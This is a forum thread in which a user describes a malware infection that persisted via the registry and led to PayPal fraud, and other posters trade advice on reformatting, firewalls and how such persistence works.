Associate
- Joined
- 25 Mar 2021
- Posts
- 267
Ouch. That’s a day in the sunshine gone 
It's happened, I was hacked
- Thread starter Frenzy
- Start date
Associate
- Joined
- 25 Mar 2021
- Posts
- 267
My other half had her Facebook account compromised last week via a link in a message that grabbed the authentication token from her phone. Scared the **** out of her but maybe, just maybe, I’ll be able to get her to RTFM and other precautions in the future.
I didn't have any cracked games or software on this pc which is why I was so confused as to how I was infected. I'm not networked to other pcs either.
This malware installs itself to the registry and runs from it too which makes it very difficult to remove. It's being actively developed which is prob why no av could catch it. Apparently it primarily targets crypto, I guess when they found no crypto they went after other stuff.
I've been refunded by paypal now and added an authenticator to my phone too.
This malware installs itself to the registry and runs from it too which makes it very difficult to remove. It's being actively developed which is prob why no av could catch it. Apparently it primarily targets crypto, I guess when they found no crypto they went after other stuff.
I've been refunded by paypal now and added an authenticator to my phone too.
Last edited:
Soldato
I use NetLimiter and by default I force it to block then ask for permission to allow any ingoing or outgoing connections.
this was on the back of my machine contastnly getting pinged by suspicious incoming ip addresses from mostly China & Russia under the guise of some sort of research program when you visited them. Seemed very dodgy so at least I could block them. After a re-format they went away despite your usual scanners picking up nothing. I could not have known about it for a long time though.
this was on the back of my machine contastnly getting pinged by suspicious incoming ip addresses from mostly China & Russia under the guise of some sort of research program when you visited them. Seemed very dodgy so at least I could block them. After a re-format they went away despite your usual scanners picking up nothing. I could not have known about it for a long time though.
Soldato
that is why you should stick to private trackers
Soldato
Thats why I dont like Whatsapp it can be misused and its not safe. They go on about it cant be hacked the encryption is end to end we are going to pull out of the UK if the Wotsit Security bill is passed. You think you are safe then something like this happens. You could say its not Whatapps its the PC being compromised but Whatsapp was the method used to authorise the transaction.
Last edited:
With a Trojan I feel this is the best course of action, unfortunately you will never be certain that Malwarebytes or another anti malware has got everything and you won’t get reinfected. It will only take that one zero day or start-up link and you start the whole process again.
If you use any removable media and especially if you’ve used it since being infected make sure to check it for any signs of infection from a known clean device.
Good you were refunded and lesson learned
Sorry, what? "Installs to the registry and runs from the registry?" What do you mean by this?
WhatsApp really isn't the problem here, I can't say for certain what has happened but this malware doesn't just install itself on your PC, possible it has been deployed bundled with other malware but usually that'll be a dropper spread by something using worming behaviour on a network which Frenzy said isn't the situation here.
It doesn't install itself to the registry in the way they seem to be implying but some of these script heavy malware place startup registry entries which can reinfect the machine using packed PowerShell commands.
Last edited: